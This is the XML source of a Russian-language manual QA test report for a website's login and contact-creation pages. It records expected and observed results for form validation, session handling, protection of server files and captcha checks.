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3C9" w:rsidRPr="00117E63" w:rsidRDefault="00C30709">
      <w:pPr>
        <w:spacing w:before="200" w:after="60"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QA Test Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002643C9" w:rsidRPr="00117E63" w:rsidRDefault="00C30709">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/contact/login &amp; /contact/create</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002643C9" w:rsidRDefault="00C30709">
      <w:pPr>
        <w:spacing w:after="280"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Шаблон ручного тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002643C9" w:rsidRDefault="00C30709">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Информация о прогоне</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="15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2796"/>
      </w:tblGrid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Дата тестирования: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4E4505">
            <w:r>
              <w:t>08.04.2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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Тестировщик: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4E4505">
            <w:r>
              <w:t>QA-инженер</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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Версия / сборка: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Тестовая среда (URL):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0F7602" w:rsidRDefault="004E4505" w:rsidP="000F7602">
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>https</w:t>
            </w:r>
            <w:r w:rsidRPr="000F7602">
              <w:t>://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>example</w:t>
            </w:r>
            <w:r w:rsidRPr="000F7602">
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>invalid</w:t>
            </w:r>
            <w:r w:rsidR="000F7602" w:rsidRPr="000F7602">
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="000F7602">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>contact</w:t>
            </w:r>
            <w:r w:rsidR="000F7602" w:rsidRPr="000F7602">
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="000F7602">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>create</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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Браузер / версия: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4E4505" w:rsidRDefault="004E4505" w:rsidP="000F7602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="000F7602">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Chrome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002643C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="25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b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Примечания:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="127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</w:tbl>
    <w:p w:rsidR="002643C9" w:rsidRDefault="00C30709">
      <w:pPr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Предусловия</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002643C9" w:rsidRDefault="00C30709">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• Использовать тестовую среду.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002643C9" w:rsidRDefault="00C30709">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• Иметь минимум 2 аккаунта: без 2FA и с email 2FA.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002643C9" w:rsidRDefault="00C30709">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• Для кейсов блокировки IP: возможность очистить login_attempts.json или дождаться разблокировки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002643C9" w:rsidRDefault="00C30709">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• Для отправки в Bitrix (раздел 6.3): bitrix_mock_mode = false в config.php.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002643C9" w:rsidRDefault="00C30709">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• Для кейсов без реальной отправки: bitrix_mock_mode = true.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002643C9" w:rsidRDefault="00C30709">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• Логи смотреть в: contact/login/logs/auth_YYYY-MM.csv, attacks_YYYY-MM.csv, bitrix_data_YYYY-MM.csv, form_errors_YYYY-MM.csv.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b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Среда</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId7" w:tooltip="https://example.com/contact/login/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>https://example.com/contact/create/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002643C9" w:rsidRDefault="00C30709">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обозначения</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="15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1696"/>
      </w:tblGrid>
      <w:tr w:rsidR="002643C9"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Skip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="116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sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>✓ Тест пройден</w:t>
            </w:r>
          </w:p>
        </w:tc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sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>✗ Тест провален</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>— Пропущен</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="116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color w:val="666666"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Описать реальное поведение системы, расхождение с ожидаемым, номер бага (если есть)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002643C9" w:rsidRDefault="002643C9">
      <w:pPr>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002643C9" w:rsidRDefault="00C30709">
      <w:pPr>
        <w:spacing w:before="320" w:after="12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lastRenderedPageBreak/>
        <w:t>Тест-кейсы</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="15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3580"/>
        <w:gridCol w:w="3302"/>
        <w:gridCol w:w="3911"/>
        <w:gridCol w:w="847"/>
        <w:gridCol w:w="2476"/>
      </w:tblGrid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1. Форма входа — поля и валидация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Пустые поля логин + пароль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Нажать «Войти» без заполнения полей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 об ошибке, валидация required или «Неверный логин или пароль»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17E63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117E63" w:rsidP="00117E63">
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Ошибка: Неверный логин или пароль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Пустой логин, заполненный пароль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Оставить логин пустым, ввести пароль, нажать «Войти»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 об ошибке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>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Segoe UI Symbol"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="444444"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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 w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Ошибка: Неверный логин или пароль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Заполненный логин, пустой пароль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логин, оставить пароль пустым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 об ошибке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 w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Ошибка: Неверный логин или пароль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Регистронезависимость логина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логин в верхнем регистре (ADMIN вместо admin)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Пользователь найден, вход успешен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D1C02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D1C02">
            <w:r w:rsidRPr="00DD1C02">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Успешный вход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Логин с пробелами по краям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логин с пробелами спереди/сзади: «  admin  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Пробелы обрезаются, вход успешен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A77A3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DD1C02" w:rsidRDefault="008A77A3">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD1C02">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Успешный вход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Очень длинный логин (&gt;2000 символов)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логин длиной 3000+ символов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Ошибка, лог не ломается (truncate до 2000)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ECC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ECC">
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Ошибка: Неверный логин или пароль</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, логин остается в поле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Логин с Unicode-символами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логин с кириллицей или эмодзи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Корректная обработка, ошибка «Неверный логин или пароль»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ECC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ECC">
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Ошибка: Неверный логин или пароль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Сохранение логина после ошибки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неверный пароль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редиректа (PRG) поле логина остаётся заполненным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ECC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ECC">
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Ошибка: Неверный логин или пароль</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, логин остается в поле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LOGIN-10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Визуальное состояние ошибки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неверные данные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Блок ошибки виден, текст читаем, исчезает после успешного ввода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ECC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ECC">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Блок ошибки виден, текст читаем, исчезает после успешного ввода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C21BEF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>LOGIN-11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Автозаполнение браузером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успешного входа выйти и вернуться на логин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Браузер предлагает автозаполнение, форма принимает данные корректно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6C0002">
            <w:r>
              <w:t>Не было автозаполнения, наверное зависит от настроек браузера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LOGIN-12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Скрытое поле smart-token (капча)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DevTools, проверить наличие smart-token в форме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Поле формируется после прохождения капчи, присутствует скрипт smartcaptcha.yandexcloud.net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550FF5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550FF5">
            <w:r>
              <w:t xml:space="preserve">После прохождения капчи в </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>devtools</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>присутствует скрипт smartcaptcha.yandexcloud.net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2. Доступ и базовая авторизация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Анонимный доступ к защищённой странице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/contact/create без авторизации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Редирект на /contact/login/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677ECD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677ECD" w:rsidRDefault="00677ECD" w:rsidP="00677ECD">
            <w:r w:rsidRPr="00677ECD">
              <w:t>При открытии /contact/create редиректся на /contact/login/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Успешный вход без 2FA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Войти под пользователем без 2FA с валидными данными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Успешный вход, редирект на /contact/create, в auth есть SUCCESS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6677EA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6677EA" w:rsidP="006677EA">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Успешный вход, редирект на /contact/create, в auth появляется SUCCESS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Неверный пароль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существующий логин и неверный пароль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Сообщение: «Неверный логин или пароль», в auth есть FAIL_PASSWORD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E77A97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E77A97">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Ошибка «Неверный логин или пароль», в auth есть FAIL_PASSWORD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Несуществующий логин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несуществующий логин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Сообщение: «Неверный логин или пароль», в auth есть FAIL_USER_NOT_FOUND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824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824">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Ошибка: «Неверный логин или пароль», в auth есть FAIL_USER_NOT_FOUND</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002643C9" w:rsidRPr="008A77A3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Повторный вход при активной сессии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Авторизоваться и открыть /contact/login/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Пользователь не видит форму логина, идёт редирект на /contact/create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A77A3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8A77A3" w:rsidRDefault="008A77A3" w:rsidP="008A77A3">
            <w:r w:rsidRPr="004F369C">
              <w:rPr>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>После успешной авторизации при открытии /contact/login/ идёт редирект на /</w:t>
            </w:r>
            <w:r w:rsidRPr="004F369C">
              <w:rPr>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>contact</w:t>
            </w:r>
            <w:r w:rsidRPr="004F369C">
              <w:rPr>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="004F369C">
              <w:rPr>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>create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Выход из системы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На</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> /contact/create </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>нажать</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> «</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Выйти</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63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Сессия завершается, редирект на /contact/login/; повторный вход снова требует авторизацию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4F369C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4F369C" w:rsidRDefault="004F369C" w:rsidP="004F369C">
            <w:r w:rsidRPr="004F369C">
              <w:t xml:space="preserve">При нажатии на «Выйти» сессия завершается, редирект </w:t>
            </w:r>
            <w:r w:rsidRPr="004F369C">
              <w:lastRenderedPageBreak/>
              <w:t>на /contact/login/; повторный вход снова требует авторизацию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AUTH-07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Закрытие системных файлов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Попробовать открыть users.json, config.php, каталог logs/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Прямой доступ из браузера запрещён (403 или 404)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557CB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8557CB" w:rsidRDefault="008557CB">
            <w:r>
              <w:t>Выходит ошибка 404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Закрытие файлов библиотек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Попробовать открыть lib/csv_logger.php, lib/mailer.php и т.д.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Прямой доступ запрещён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22E2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22E2">
            <w:r>
              <w:t>Выходит ошибка 404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AUTH-09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Закрытие login_attempts.json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Попробовать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открыть</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> contact/login/login_attempts.json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Прямой доступ запрещён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22E2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22E2">
            <w:r>
              <w:t>Выходит ошибка 404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AUTH-10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session_regenerate_id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Авторизоваться, запомнить session ID. Выйти и войти снова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Session ID </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>изменился</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>защита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от</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> session fixation)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6C0002" w:rsidRPr="006C0002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1A2AD1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>AUTH-11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Проверка cookie-параметров сессии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DevTools → Application → Cookies, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>проверить</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> cookie </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>сессии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httponly, SameSite=Strict, path=/; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>при</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> HTTPS — secure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A2AD1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A2AD1" w:rsidRDefault="001A2AD1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Эти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данные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только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у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Name </w:t>
            </w:r>
            <w:r w:rsidRPr="001A2AD1">
              <w:rPr>
                <w:color w:val="E3E3E3"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="282828"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>contact_create_auth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 - </w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>httponly</w:t>
            </w:r>
            <w:r w:rsidRPr="001A2AD1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SameSite</w:t>
            </w:r>
            <w:r w:rsidRPr="001A2AD1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Strict</w:t>
            </w:r>
            <w:r w:rsidRPr="001A2AD1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>path</w:t>
            </w:r>
            <w:r w:rsidRPr="001A2AD1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">=/; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>при</w:t>
            </w:r>
            <w:r w:rsidRPr="001A2AD1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HTTPS</w:t>
            </w:r>
            <w:r w:rsidRPr="001A2AD1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> — </w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>secure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AUTH-12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Доступ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</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> contact/process.php GET-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>запросом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contact/process.php в браузере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JSON-ответ: «Поддерживается только POST-запрос.»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A2AD1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A2AD1" w:rsidRDefault="001A2AD1" w:rsidP="001A2AD1">
            <w:r w:rsidRPr="001A2AD1">
              <w:t>Ответ {"error":"Поддерживается только POST-запрос."}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AUTH-13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Время жизни сессии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Авторизоваться и проверить параметры cookie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Время жизни = 30 дней (2592000 секунд)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6C0002" w:rsidRPr="006C0002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3. CAPTCHA (Яндекс SmartCaptcha)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Отправка логина без капчи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входа без smart-token (curl/DevTools)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«Не пройдена проверка на робота...», в auth есть FAIL_CAPTCHA_MISSING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32619">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:sz w:val="18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32619">
            <w:r>
              <w:t xml:space="preserve">Ошибка: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B32619">
              <w:t xml:space="preserve">Не пройдена проверка на робота. Проверьте, что капча </w:t>
            </w:r>
            <w:r w:rsidRPr="00B32619">
              <w:lastRenderedPageBreak/>
              <w:t>загрузилась, и попробуйте снова.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CAPTCHA-02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Невалидная или протухшая капча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с невалидным/просроченным токеном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 об ошибке проверки; в auth есть FAIL_CAPTCHA_INVALID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F5824" w:rsidRPr="00BF5824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API SmartCaptcha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Подменить captcha_server_key на невалидный и отправить форму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auth </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>есть</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> FAIL_CAPTCHA_ERROR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824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</w:t>
            </w:r>
            <w:r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☐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332B7">
            <w:r>
              <w:t>При авторизации ошибка, в</w:t>
            </w:r>
            <w:r w:rsidR="00BF5824">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>auth</w:t>
            </w:r>
            <w:r w:rsidRPr="001332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1332B7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>FAIL</w:t>
            </w:r>
            <w:r w:rsidRPr="001332B7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CAPTCHA</w:t>
            </w:r>
            <w:r w:rsidRPr="001332B7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ERROR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Пустой серверный ключ капчи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Временно очистить captcha_server_key в config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auth </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>есть</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> FAIL_CAPTCHA_ERROR;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debug-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>режиме</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> — error_log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332B7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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="444444"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>☐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332B7">
            <w:r>
              <w:t xml:space="preserve">При авторизации ошибка, в </w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>auth</w:t>
            </w:r>
            <w:r w:rsidRPr="001332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1332B7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>FAIL</w:t>
            </w:r>
            <w:r w:rsidRPr="001332B7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
